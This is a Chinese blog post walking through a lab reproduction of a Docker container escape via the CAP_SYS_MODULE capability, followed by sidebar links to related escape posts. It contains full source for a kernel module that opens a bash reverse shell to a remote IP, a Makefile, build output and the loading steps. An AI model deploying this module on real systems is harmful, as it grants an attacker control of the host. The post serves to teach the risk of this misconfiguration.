容器逃逸漏洞分析 CAP_SYS_MODULE

已于 2024-01-07 08:24:03 修改
阅读量495 收藏 10
点赞数 6
分类专栏: 容器安全 文章标签: 容器 安全
于 2024-01-03 17:12:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31610083/article/details/135366135
版权

容器逃逸漏洞分析 危险配置 SYS_MODULE

一、漏洞简介

开启cap_sys_module权限的容器允许加载内核模块。由于容器与宿主机共享内核,攻击者可以在容器内加载包含恶意代码的内核模块,获取特权后进一步逃逸并控制宿主机。

二、前置知识

CAP_SYS_MODULE

从 Linux 2.2 开始,Linux 将传统上与超级用户相关的权限划分为不同的单元,称为能力(capabilities)。 能力是每个线程的属性,可以独立启用或禁用。

其中CAP_SYS_MODULE允许进程可以通过init_module()和delete_module()系统调用来加载和卸载内核模块。由于内核模块具有内核态命令执行权限,该能力是关键能力之一。

三、漏洞利用路径

  1. 准备恶意内核模块
  2. 通过finit_module()或init_module()加载准备好的恶意内核模块
  3. 执行恶意内核模块中的payload(如反弹shell)

四、漏洞复现

环境配置:

  • ubuntu 20.04
  • docker 23.0.2

搭建环境:

# docker+k8s
./metarget gadget install docker --version 18.03.1
./metarget gadget install k8s --version 1.16.5 --domestic
# 启动带cap_sys_module配置的容器
./metarget cnv install cap_sys_module-container

编写自定义模块reverse-shell.c,代码如下:

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.19.xx/4321 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

编写Makefile文件:

obj-m +=reverse-shell.o
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

然后执行make编译模块:

make -C /lib/modules/4.15.0-132-generic/build M=/home/nsfocus/sys_module modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-132-generic'
  CC [M]  /home/nsfocus/sys_module/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/nsfocus/sys_module/reverse-shell.mod.o
  LD [M]  /home/nsfocus/sys_module/reverse-shell.ko

将编译生成的reverse-shell.ko文件拷贝至容器内,把/sbin/insmod/bin/kmod拷贝至容器对应目录,执行insmod加载模块,最终成功获取宿主机的shell。

五、总结

容器中80%的风险来自于配置不当,其中linux capabilities是容器权限中的重要配置项。本文简要介绍了具有CAP_SYS_MODULE能力的容器是如何加载恶意内核模块并完成逃逸的过程。

六、参考链接

  1. metarget/writeups_cnv/config-cap_sys_module-container at master · Metarget/metarget (github.com)
根本不是咖啡猫
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker 容器逃逸漏洞 (CVE-2020-15257)
12-26 2万+
漏洞简述: 当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升。 漏洞利用: (1)安装有漏洞的containerd版本,影响版本containerd< 1.3.9&&containerd < 1.4.3 #列出仓库中可用的版本,安...
GoLang 逃逸分析的机制详解
09-18
Go 语言的逃逸分析是编译器优化的一项关键技术,其目标是确定变量或对象的内存分配位置,以便在栈上或堆上有效地管理内存。逃逸分析的主要目的是减少不必要的堆分配,提升程序的运行效率,同时降低内存管理的复杂性...
安全(2)--CAP_SYS_MODULE逃逸
azraelxuemo的博客
10-20 434
发现有CAP_SYS_MODULE权限,那么直接往内核注入恶意module,我们直接在容器里面安装必备的东西。然后使用capsh decode一下。make all编译一下。
linux下的特权逃逸与docker逃逸(二)
好好睡觉
01-02 673
cap_sys_pstrace导致的dicker逃逸cap_sys_module可以引发的提权、cap_sys_module可以引发的docker逃逸
解决:Loading kernel module CAP_SYS_MODULE CAP_NET_ADMIN alias netdev-eth0 instead
weixin_34106122的博客
09-24 1001
克隆虚拟机、启动、配置网络、重启网络服务遇到如下问题:[root@localhost ~]# service network restart Loading kernel module for a network device with CAP_SYS_MODULE (deprecated). Use CAP_NET_ADMIN and alias netdev-eth0 ...
Linux 日志:Loading kernel module for a network device with CAP_SYS_MODULE (deprecated)
mzhan017的博客
08-06 1186
CAP_SYS_MODULE已经被遗弃,不再使用,如果有module 还在使用的话,就会打印这条log;希望引起module开发者的注意,尽快使用新的选项。 pr_warn("Loading kernel module for a network device with CAP_SYS_MODULE (deprecated). Use CAP_NET_ADMIN and alias netdev-%s instead.\n", /linux-3.10.0-862.14.4.el7/net/core/d.
docker逃逸漏洞(CVE-2019-5736)
热门推荐
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
docker的逃逸复现(CVE-2020-15257-host模式容器逃逸漏洞
m0_63306943的博客
02-28 1282
因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸。host模式这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。
Julia—逃逸时间算法.rar_Julia C_julia
09-19
通过分析这个脚本,我们可以学习到如何在Julia中编写逃逸时间算法,包括定义复数类型,设置迭代条件,以及绘制结果图像等步骤。 例如,Julia提供了内置的复数类型`Complex`,我们可以直接使用`Complex(zr, zi)`创建...
VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞win平台exe利用工具
11-29
VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞POC,可以实行堆溢出攻击。
JVM逃逸_分析、利用与防御.pdf
09-10
本文主要围绕JVM逃逸展开,包括其分析、利用和防御策略。 首先,我们要理解Java的流行性和广泛的应用场景。作为一种跨平台的编程语言,Java被用于大型系统、个人电脑以及嵌入式设备。JVM是Java运行的基础,包括...
简述Java编程语言中的逃逸分析
08-29
Java 逃逸分析基础知识点 1. 逃逸分析定义 逃逸分析是一种可以有效减少 Java 程序中同步负载和内存堆分配压力的跨函数全局数据流分析算法。通过逃逸分析,Java Hotspot 编译器能够分析出一个新的对象的引用的使用...
docker逃逸漏洞总结
weixin_35756130的博客
02-13 206
Docker 逃逸漏洞主要有两种:第一种是由于容器中的应用程序的设计错误而导致的;第二种是由于容器安全设置不当而导致的。为了避免这两种漏洞,建议在部署容器时,应该采用一些安全的措施,如控制容器的访问权限、限制容器的网络通信等。 ...
docker逃逸漏洞复现
风雨来花满楼的博客
07-20 430
如何判断是否在docker工作环境下 docker环境下:ls -alh /.dockerenv , 非docker环境,没有这个.dockerenv文件的(定制化比较高的docker系统也可能没有这个文件) 查询系统进程的cgroup信息 cat /proc/1/cgroup CVE-2020-15257 容器逃逸漏洞利用 CVE-2020-15257的利用条件——net namespace(–net=host)与宿主机共享 以以下命令运行容器 docker run --rm --net=
沙箱逃逸漏洞复现
qq_52178594的博客
08-06 216
沙箱就是能够像一个集装箱一样,把你的应用“装”起来的技术。这样,应用与应用之间,就因为有了边界而不至于相互干扰而被装进集装箱的应用,也可以被方便地搬来搬去。
Linux内核之capabilities能力(十七)
Android系统攻城狮
09-19 2292
Capabilities的主要思想在于分割root用户的特权,即将root的特权分割成不同的能力,每种能力代表一定的特权操作。例如:能力CAP_SYS_MODULE表示用户能够加载(或卸载)内核模块的特权操作,而CAP_SETUID表示用户能够修改进程用户身份的特权操作。在Capbilities中系统将根据进程拥有的能力来进行特权操作的访问控制。 在Capilities中,只有进程和可执行文件才具有能力,每个进程拥有三组能力集,分别称为cap_effective, cap_inheritabl...
[转载] Linux的capability深入分析
a172742451的专栏
04-21 2718
[转载] Linux的capability深入分析 一)概述: 1)从2.1版开始,Linux内核有了能力(capability)的概念,即它打破了UNIX/LINUX操作系统中超级用户/普通用户的概念,由普通用户也可以做只有超级用户可以完成的工作. 2)capability可以作用在进程上(受限),也可以作用在程序文件上,它与sudo不同,sudo只针对用户/程序/文件的概
ConfigMap-secrets-静态pod
最新发布
weixin_46466657的博客
07-14 5333
ConfigMap资源,简称CM资源,它生成的键值对数据,存储在ETCD数据库中应用场景:主要是对应用程序的配置pod通过env变量引入ConfigMap,或者通过数据卷挂载volume的方式引入ConfigMap资源官方解释:configMap 卷提供了向 Pod 注入配置数据的方法。ConfigMap 对象中存储的数据可以被 configMap 类型的卷引用,然后被 Pod 中运行的容器化应用使用。引用 configMap 对象时,你可以在卷中通过它的名称来引用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值